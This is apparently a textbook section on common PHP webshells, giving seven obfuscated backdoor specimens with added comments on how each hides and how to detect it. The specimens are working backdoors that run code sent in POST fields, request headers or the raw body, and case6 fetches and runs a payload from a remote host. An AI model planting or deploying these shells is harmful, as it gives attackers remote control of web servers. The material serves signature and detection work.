4.3.2 常见WebShell

case1:


<?php 
    // Specimen kept byte-for-byte for signature work; only comments are added.
    // Mixed-case names (sTr_RepLaCe, HeaDeR, NuLl) still resolve because PHP function
    // names and keywords are case-insensitive, so detection rules must match them
    // case-insensitively.
    // Removing the backticks from the literal leaves the string "assert", so that
    // function name never appears verbatim in the file.
    $K=sTr_RepLaCe('`','','a`s`s`e`r`t');
    // Unquoted array key: older PHP versions fall back to the string 'ice' (with a
    // notice); PHP 8 raises an error for the undefined constant instead.
    $M=$_POST[ice];
    // Without an "ice" field the script only emits a 'Status:404' header --
    // presumably so a casual visit looks like a missing page (TODO confirm how the
    // server's SAPI treats this header).
    IF($M==NuLl)HeaDeR('Status:404');
    // Otherwise the request field is handed to the callable held in $K. assert()
    // evaluated string arguments as PHP code in PHP 5/7 (deprecated in 7.2, removed
    // in 8.0). Detection cue: a variable used as a function name whose argument
    // comes straight from a request superglobal.
    Else/**/$K($M);
?>

图4-16 功能完善的WebShell

case2:


<?php 
// Specimen kept byte-for-byte; only comments are added. The short trailing
// comments on the original lines look like random filler markers.
// Four fragments of a doubly base64-encoded payload, stored out of order so the
// encoded text never appears as one contiguous string.
$qajd2="VDFOVVd5";$vvnr1="UUdWMllX";$hitq5="d29KRjlR";$itfh2="ZGtabmg2Y1RRblhTazc=";// dfxzq4 
// Junk-token removal ("eu2") rebuilds the name "str_replace" itself.
$akmi4 = str_replace("eu2","","eu2seu2teu2reu2_reu2eeu2pleu2aeu2ce");// ulgp9 
// The rebuilt str_replace strips "so0" to produce "base64_decode".
$hygg4 = $akmi4("so0", "", "so0baso0sso0e6so04so0_so0dso0eso0cso0oso0dso0e");// qbhm1 
// Same trick with "qik6" produces "create_function".
$gzsw5 = $akmi4("qik6","","qik6cqik6reqik6atqik6eqik6_fqik6uncqik6tqik6ioqik6n"); // kfcs6 
// The fragments are joined in the order $vvnr1.$hitq5.$qajd2.$itfh2; the "$;*,."
// replacement is a decoy (none of those characters occur in base64 text). The
// result is base64-decoded twice and compiled by create_function() as a function
// body, then invoked. Decoded statically, the body evaluates a POST field as PHP
// code. create_function() was deprecated in PHP 7.2 and removed in 8.0.
// Detection cues: function names assembled by str_replace on junk tokens, nested
// decode calls through variable functions, and a freshly created function that is
// called immediately.
$foxl6 = $gzsw5('', $hygg4($hygg4($akmi4("$;*,.", "", $vvnr1.$hitq5.$qajd2.$itfh2)))); $foxl6(); 
?>

case3:


// php://input based backdoor
// uses include('php://input') to execute arbritary code
// Any valid PHP code sent as raw POST data to backdoor is ran
// overrides the php.ini settings using ini_set :)
// Insecurety Research 2013 | insecurety.net
<?php
// Specimen kept byte-for-byte; only comments are added.
// NOTE(review): the call below passes ONE string, 'allow_url_include, 1', rather
// than a setting name and a value, so as written it changes nothing. The PHP
// manual also lists allow_url_include as changeable only at system level
// (php.ini / server config), so the header's "overrides php.ini" claim should be
// treated as unverified.
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
// include() on the php://input stream makes PHP parse the raw request body as a
// script. The manual documents php://input as restricted by allow_url_include,
// so keeping that directive Off (the default) is the mitigation.
// Detection cues: include/require of a php:// or data: stream wrapper in source,
// and POST bodies that begin with a PHP open tag in web or WAF logs.
include('php://input');
?>

case4:


<?php /* Defender note (specimen kept byte-for-byte; only this comment is added):
   the string literals are glued together around filler comments. "s"."s"."e"."r"
   is built first, then "a" . $_ . "t", which spells "assert". The superglobal is
   reached through a variable-variable assembled from "_P"."OS"."T", and the array
   key is the arithmetic expression 0-2-5, i.e. -7. The @ operators silence errors.
   Raw-text signatures miss all of this: strip comments and fold constant
   concatenations (or scan the token stream) before matching. Dense runs of
   comment delimiters between tokens are themselves a useful heuristic. */ @$_="s"."s"./*- 
//////////////////// 
*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/ 
/////////////////////
*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> 

case5:


<?php 
    // Specimen kept byte-for-byte; only comments are added.
    // The function name is stored as an ordinary array value. The literal 'assert'
    // is present, but nowhere near a call site or a request variable.
    $item['wind'] = 'assert'; 
    // Nesting it one level deeper moves the name further from the eventual call.
    $array[] = $item; 
    // The array element is used as a callable and receives the POST field
    // 'hkwwj'. On PHP versions where assert() evaluates strings (removed in 8.0)
    // this executes the submitted text. Detection cue: a call whose function
    // position is an array element or property, with a request superglobal as
    // the argument; taint tracking needs to follow values through array writes.
    $array[0]['wind']($_POST['hkwwj']);
?>

case6:


<?php
// Specimen kept byte-for-byte; only comments are added.
// Session storage is used further down to cache the downloaded payload.
session_start();
// -1 removes the per-script memory limit.
ini_set('memory_limit',-1);
// The byte values spell "pack", so $i becomes an alias for pack() without that
// name being used as a callable in plain text.
$i = pack('c*', 0x70, 0x61, 99, 107);
// Every function name and the URL are rebuilt from numeric or hex data, so the
// file contains none of them as readable strings.
$GLOBALS = array(
    // "pack"
    'p' => pack('c*', 0x70, 0x61, 99, 107),
    // "call_user_func"
    'c' => $i('c*', 99, 97, 108, 108, 95, 117, 115, 101, 114, 95, 102, 117, 110, 99),
    // "file_get_contents"
    'f' => $i('c*', 102, 105, 108, 101, 95, 103, 101, 116, 95, 99, 111, 110, 116, 101, 110, 116, 115),
    // "create_function"
    'e' => $i('c*',0x63,0x72,0x65,0x61,0x74,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e),
    // Hex-encoded URL; decoded and defanged: hxxp://blakin[.]duapp[.]com/v1
    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
    // "sprintf"
    's' =>$i('c*',0x73,0x70,0x72,0x69,0x6e,0x74,0x66)
);
// First request in a session: fetch the remote content and keep it in the session.
if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
// The cached content is hex-decoded, compiled as a function body with
// create_function() and invoked through call_user_func(). The executable payload
// therefore lives on the remote host, not in this file. Detection cues: outbound
// HTTP from the web-server process to an unexpected host, pack() fed long numeric
// lists, and callables taken from array elements.
$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSION['t']))));
?>

case7:


<?php
// Specimen kept byte-for-byte; only comments are added.
// The variables below hold fragments of one PHP function body, shuffled and
// padded with the junk token 'Do' so that no keyword survives intact.
// NOTE(review): the overall layout resembles agents generated by the Weevely
// tool -- an assumption to confirm, not something the file states.
$w='Do0;$Doi<$l;Do){for($j=0;($Doj<$cDo&&$i<$l);$j++Do,Do$i++){$o.DoDo=$t{$i}^Do$k{$j};}Do}retDourn $o;}$r=Do$_SER';
// Junk-token removal ('km') yields the name "create_function".
$y=str_replace('km','','crkmekmate_kmkmfukmkmnction');
$t='($e)Do{$k=$khDo.$kf;ob_sDotDoart();@eDoval(@gzDouDoncomDopress(Do@x(@bDoase64Do_decode(preg_replaDoce(aDoDorr';
$b='$kh="63Doa9"Do;$kfDo="f0eaDo";fuDoncDotion x($t,$kDo){$c=strlen($kDo);$lDo=strlen(Do$t);$o=Do"";fDoor($iDo=';
$f='ay("/Do_/","Do/-/"),aDorrayDo("/","+"Do),$ss($s[$Doi],0,DoDo$e))Do),$k)));$o=ob_get_DoconteDonDots();ob_endDo_cle';
$H=']Do+(Do?:;Doq=0.([\\d]))?,?/",$ra,DoDo$m);if($q&Do&$m){@seDossDoionDoDo_start();$s=&$_DoSESSIODoNDo;$ss="substr";$Do';
$I='sl=Do"sDotrtDoolower";$i=$mDo[Do1][0].$m[1][1];$Doh=$sl($Doss(mdDo5($i.$kDoh),0,3Do));$DofDo=$sl($ss(md5(DoDo$i.$kf),0';
$K='VEDoR;$rrDo=@$r[Do"HTTDoP_REFERDoER"];$rDoaDoDo=@$Dor["HTTP_DoACCEPDoT_LANGUADoGE"];if($rr&&$raDo)Do{$Dou=Dopars';
$a='e_url($rr);paDorse_str($Dou["querDoy"Do]Do,$q);$Doq=array_DoDovaDolues($q);prDoeDog_Domatch_all(Do"/([\\w])[\\w-';
$A='Do,3))Do;$p="Do";Dofor($z=1;$Doz<cDoount($m[Do1]DoDo);Do$z++)$p.=$q[$m[2][$Doz]Do];if(strpos($DoDop,$h)===0)Do';
$S='an()Do;$d=baDoseDo64_encoDode(x(gzDoDocompressDo($o)DoDo,Do$k));print("<$k>Do$Dod</$k>");@session_deDostroy(Do);}}}}';
$M='{Do$s[$i]="";$Dop=$ss($pDo,3);}if(arDoray_kDoey_existDos($i,$DoDos)){$Dos[$i].=Do$p;$e=strpDoos($s[Do$i],$f);DoifDo';
// The fragments are joined in their real order and the 'Do' filler is removed.
// With the filler removed the visible pieces show: two short key halves
// ($kh, $kf), an XOR routine x(), input read from the HTTP_REFERER and
// HTTP_ACCEPT_LANGUAGE entries of $_SERVER, session storage for partial input,
// and an eval(gzuncompress(x(base64_decode(...)))) chain. Output is compressed,
// XOR-ed, base64-encoded and printed inside a tag named after the key.
$Q=str_replace('Do','',$b.$w.$K.$a.$H.$I.$A.$M.$t.$f.$S);
// The reassembled source is compiled with create_function() and run at once.
// Nothing arrives in POST fields, so request-body inspection will not see it:
// log and baseline the Referer and Accept-Language headers instead. File-side
// cues: many single-letter variables holding code-like strings sharing one filler
// token, plus str_replace feeding a dynamically created function.
$P=$y('',$Q);$P();
?>